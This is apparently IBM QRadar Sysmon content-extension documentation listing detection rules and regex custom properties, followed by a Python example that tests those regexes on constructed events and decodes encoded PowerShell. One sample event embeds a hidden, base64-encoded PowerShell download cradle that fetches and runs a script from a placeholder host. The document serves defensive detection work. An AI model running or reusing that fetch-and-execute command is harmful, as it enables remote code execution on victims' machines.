Building Block | BB: An Administrative share Has Been Accessed | Used in rules that detect any malicious activities with shared folders. |
Building Block | BB: CreateRemoteThread Detected | Used in rules that detect the creation of remote threads. |
Building Block | BB: Normal Windows Processes Accessed LSASS.exe | Lists the Windows processes that normally access lsass.exe; used in the rules that detect suspicious access to the LSASS process. |
Building Block | BB: Detected a PowerShell Process | Used in rules that detect PowerShell processes. |
Building Block | BB: A Scheduled Task Has Been Created | Used in rules that detect scheduled tasks. |
Building Block | BB: Detected a Scheduled Task based on Process Creation Event Part 1 | Used in rules that detect scheduled tasks based on process event creation. |
Building Block | BB: Pipe Has Been Created | Used in rules that detect pipe creation. |
Building Block | BB: Detected a Scheduled Task based on Process Creation Event Part 2 | Used in rules that detect scheduled tasks based on process event creation. |
Building Block | BB: Service Binary Path Has Been Set or Updated | Used in rules that detect if a service path binary is set or updated. |
Building Block | BB: CreateRemoteThread excluded cases | Used in rules that detect the creation of remote threads. |
Saved Search | Abnormal Parent for a Process | This search shows any process with an unusual parent, based on the baselined data. |
Saved Search | Network Connection Detected by Windows Sensitive Processes | This search shows any connection that is initiated from a Windows sensitive process. |
Saved Search | Process Access to LSASS | This search shows any process that accessed LSASS. |
Saved Search | Remotely Launched Executables via WMI or PowerShell | This search shows processes that were run remotely. |
Saved Search | Service Binary Path Has Been Set or Updated | This search shows any new service or if the location of the service binary changes. |
Saved Search | Unknown Process Hash Has Been Started | This search shows any process hash that has not been seen before. |
Saved Search | Unsigned Executable Loaded Into Sensitive System Process | This search shows any attempt to load an unsigned executable file into sensitive system processes. |
Saved Search | Very Long Command Line Detected | This search shows long command line text. |
Reference Set | Whitelisted Hashes | Contains a list of whitelisted hashes. |
Reference Set | Systools | Contains a list of tools that are used by system administrators. |
Reference Set | Processes Hashes Started as System User | Contains a list of process hashes that can start with system-level privileges. |
Reference Set | Compromised Hosts | Contains a list that is populated with any compromised hosts. |
Reference Set | Process Name to Hash | Contains a list of process names that are mapped to their hashes. |
Reference Set | IOCs - Malicious Service Names | Contains a list of well-known malicious service names. |
IBM Security QRadar Sysmon Content Extension 1.0.0
The following table describes the changes that are included in IBM Security QRadar Sysmon Content Extension 1.0.0.
Type | Name | Change description |
---|---|---|
Rule | Unsigned Executable or DLL Loaded from Temp Directory | Detects when an unsigned executable or DLL is loaded from a temporary directory. |
Rule | Process Launched From Temp Directory | Detects when a process is launched from a temporary directory. |
Rule | Unsigned Executable or DLL Loaded Into Sensitive System Process | Detects when an unsigned executable or DLL is loaded into a sensitive system process. |
Rule | Process Created a Thread into System Process | Detects when a process creates a thread in a system process. |
Rule | Process Created a Thread From a Process That was Launched From a Temp Directory | Detects when a process that was launched from a temporary directory creates a thread in another process. |
Rule | Process Created a Thread Into Another Process | Detects when a process creates a thread in another process. |
Rule | PowerShell Malicious Usage Detected | Detects malicious PowerShell usage. |
Rule | PowerShell Malicious Usage Detected with Encoded Command | Detects malicious PowerShell usage with an encoded command. |
Rule | PowerShell script has been downloaded | Detects when a PowerShell script is downloaded. |
Rule | System Process Started from Unusual Directory | Detects when a system process starts from an unusual directory. |
Rule | Abnormal Parent for a System Process | Detects when a system process is started by an unexpected parent process. |
Rule | Suspicious svchost Process Detected | Detects suspicious svchost processes. |
Rule | Shadow Copies Delete Detected | Detects when Volume Shadow Copies are deleted. |
Building Block | BB: Unsigned Executable or DLL Loaded Into Sensitive System Process Part 1 | Used by the Unsigned Executable or DLL Loaded Into Sensitive System Process rule. |
Building Block | BB: Detected a downloaded PowerShell Script | Used by the PowerShell script has been downloaded rule. |
Building Block | BB: Detected a downloaded PowerShell Script with EncodedCommand | Used by the PowerShell Malicious Usage Detected with Encoded Command rule. |
Custom Property | Image | Image:\s(.*)\sImageLoaded |
Custom Property | ImageName | Image:\s(?:.*\\)(.*)\sImageLoaded |
Custom Property | Signed | Signed:\s(true|false) |
Custom Property | Signature | Signature:\s(.*)\sSignatureStatus |
Custom Property | SignatureStatus | SignatureStatus:\s(Valid) |
Custom Property | LoadedImage | ImageLoaded:\s(.*)\sHashes |
Custom Property | Image | Image:\s(.*)\sCommandLine |
Custom Property | ImageName | Image:\s(?:.*\\)(.*)\sCommandLine |
Custom Property | ParentImage | ParentImage:\s(.*)\sParentCommandLine |
Custom Property | ParentImageName | ParentImage:\s(?:.*\\)(.*)\sParentCommandLine |
Custom Property | Target Image Name | TargetImage:\s(?:.*\\)(.*)\sNewThreadId |
Custom Property | SourceImage | SourceImage:\s(.*)\sTargetProcessGuid |
Custom Property | TargetImage | TargetImage:\s(.*)\sNewThreadId |
Custom Property | PS Encoded Command | [\-^]{1,2}[Ee^]{1,2}[NnCcOoDdEeMmAa^]*[\s^]+(\S+) |
Custom Property | Process CommandLine | CommandLine:\s(.*)\sCurrentDirectory |
Custom Property | SourceImageTempPath | SourceImage:\s+.*((?:Windows\\Temp)|(?:AppData\\Local\\Temp))\\.* |
Custom Property | ImageTempPath | Image:\s+.*((?:Windows\\Temp)|(?:AppData\\Local\\Temp))\\.* |
Custom Property | ImageLoadedTempPath | ImageLoaded:\s+.*((?:Windows\\Temp)|(?:AppData\\Local\\Temp))\\.* |
Custom Property | Process CommandLine | Process Command Line:\s*(.*)\s*Token Elevation Type |
Custom Property | PS Encoded Command | Process Command Line:\s*powershell.*[\-^]{1,2}[Ee^]{1,2}[NnCcOoDdEeMmAa^]*[\s^]+(\S+)\s*Token Elevation Type |
Custom Property | ImageName | New Process Name:\s*(?:.*\\)(\S*)\s*Token\sElevation\sType\: |
Custom Property | SHA1 Hash | SHA1=(\w+) |
Custom Property | MD5 Hash | MD5=(\w*) |
Custom Property | SHA256 Hash | SHA256=(\w*) |
Custom Property | IMP Hash | IMPHASH=(\w*) |
Custom Property | Image | New Process Name:\s*(\S*)\s*Token\sElevation\sType\: |
Custom Function | base64Decode | Decodes the base64 text from the PowerShell encoded command into a normal readable string. |
Custom Function | PScmdFilter | Filters the process command line from the Sysmon events. |
Saved Search | Very Long Command Line Detected | This is an event search to match on long process command lines from Sysmon events. |
Reference Set | TempFilePath | Contains a list of file paths of the temporary directory. |
Reference Set | Windows Sensitive Processes | Contains a list of all Windows-sensitive processes. |
Reference Set | ProcessMaptoProcessPath | Contains a list of process names and the paths to those processes. |
Reference Set | ProcessMaptoProcessParentPath | Contains a list of process names and the paths to the parent processes. |
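The custom-property regular expressions above are applied by QRadar to the raw event payload, and the base64Decode custom function turns the value captured by the PS Encoded Command property into readable script. The following is an added example, not code from the content extension, that runs those regexes (copied from the table) over two constructed Sysmon Event ID 1 payloads and decodes the -EncodedCommand value. It assumes the payload layout the regexes were written for: one "Field: value" per line, with CommandLine directly after Image. Newer Sysmon versions insert FileVersion, Description, Product, Company and OriginalFileName between Image and CommandLine, so verify the Image and ImageName regexes against the layout your collector actually forwards. All GUIDs, hashes and user names in the sample events are made up.

```python
# Added example (not code from the QRadar Sysmon content extension): apply the
# custom-property regexes from the table above to constructed Sysmon Event ID 1
# payloads and decode the PowerShell encoded command, as the base64Decode custom
# function is meant to do. Assumed payload layout: one "Field: value" per line,
# with CommandLine immediately after Image.
import base64
import re

# Regular expressions copied verbatim from the custom-property table.
CUSTOM_PROPERTIES = {
    "Image": r"Image:\s(.*)\sCommandLine",
    "ImageName": r"Image:\s(?:.*\\)(.*)\sCommandLine",
    "ParentImage": r"ParentImage:\s(.*)\sParentCommandLine",
    "Process CommandLine": r"CommandLine:\s(.*)\sCurrentDirectory",
    "PS Encoded Command": r"[\-^]{1,2}[Ee^]{1,2}[NnCcOoDdEeMmAa^]*[\s^]+(\S+)",
    "ImageTempPath": r"Image:\s+.*((?:Windows\\Temp)|(?:AppData\\Local\\Temp))\\.*",
    "SHA256 Hash": r"SHA256=(\w*)",
}


def extract_properties(payload):
    """Run every custom-property regex over the payload the way QRadar does:
    the first match wins and the property value is capture group 1.
    Properties that do not match are absent from the result."""
    found = {}
    for name, pattern in CUSTOM_PROPERTIES.items():
        match = re.search(pattern, payload)
        if match:
            found[name] = match.group(1)
    return found


def base64_decode_powershell(encoded):
    """Equivalent of the base64Decode custom function. -EncodedCommand carries
    the script as base64 of UTF-16LE, so decoding as UTF-8 would leave NUL bytes."""
    return base64.b64decode(encoded).decode("utf-16-le")


# Constructed sample: a download cradle hidden behind -Enc, encoded the way
# PowerShell expects it (UTF-16LE, then base64).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon Event ID 1 payload (GUIDs, hashes and user are made up).
POWERSHELL_EVENT = f"""Process Create:
UtcTime: 2017-04-28 22:08:22.025
ProcessGuid: {{A23EAE89-BD56-5903-0000-0010E9D95E00}}
ProcessId: 6228
Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
CommandLine: powershell.exe -NoP -W Hidden -Enc {SAMPLE_ENCODED}
CurrentDirectory: C:\\Users\\alice\\
User: CORP\\alice
LogonGuid: {{A23EAE89-B7B4-5903-0000-0020A5F20600}}
LogonId: 0x6f2a5
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=2F1A65E1E8B2C7F0A1B3C4D5E6F708192A3B4C5D,MD5=0C5A7A8D2B4E6F8A9B0C1D2E3F4A5B6C,SHA256=4D1B0F9E8C7A6B5D4E3F2A1B0C9D8E7F6A5B4C3D2E1F0A9B8C7D6E5F4A3B2C1D,IMPHASH=1A2B3C4D5E6F7A8B9C0D1E2F3A4B5C6D
ParentProcessGuid: {{A23EAE89-BD4F-5903-0000-0010C3C65E00}}
ParentProcessId: 3140
ParentImage: C:\\Windows\\System32\\cmd.exe
ParentCommandLine: "C:\\Windows\\System32\\cmd.exe" /c run.bat
"""

# Second constructed event: a binary started from the user's temp directory,
# the case the ImageTempPath property and the Process Launched From Temp
# Directory rule are after.
TEMP_EVENT = """Process Create:
UtcTime: 2017-04-28 22:10:01.113
ProcessGuid: {A23EAE89-BDBA-5903-0000-00104E0E5F00}
ProcessId: 7012
Image: C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe
CommandLine: "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe" /silent
CurrentDirectory: C:\\Users\\alice\\AppData\\Local\\Temp\\
User: CORP\\alice
ParentImage: C:\\Program Files\\Internet Explorer\\iexplore.exe
ParentCommandLine: "C:\\Program Files\\Internet Explorer\\iexplore.exe"
"""


def analyse(payload):
    """Extract the properties and, when an encoded command is present, decode it."""
    props = extract_properties(payload)
    if "PS Encoded Command" in props:
        props["Decoded Command"] = base64_decode_powershell(props["PS Encoded Command"])
    return props


if __name__ == "__main__":
    for event in (POWERSHELL_EVENT, TEMP_EVENT):
        for name, value in analyse(event).items():
            print(f"{name}: {value}")
        print()
```

Two properties of these regexes are worth knowing when you tune them. The `Image:` patterns are not anchored, so they also match inside `ParentImage:`; they return the right field only because the Image line comes first in the payload and the search takes the leftmost match. The PS Encoded Command pattern keys on a `-e`/`-E` switch prefix rather than on `powershell`, so it should be paired with the PowerShell process building block, as the rules in the table do, rather than used on its own.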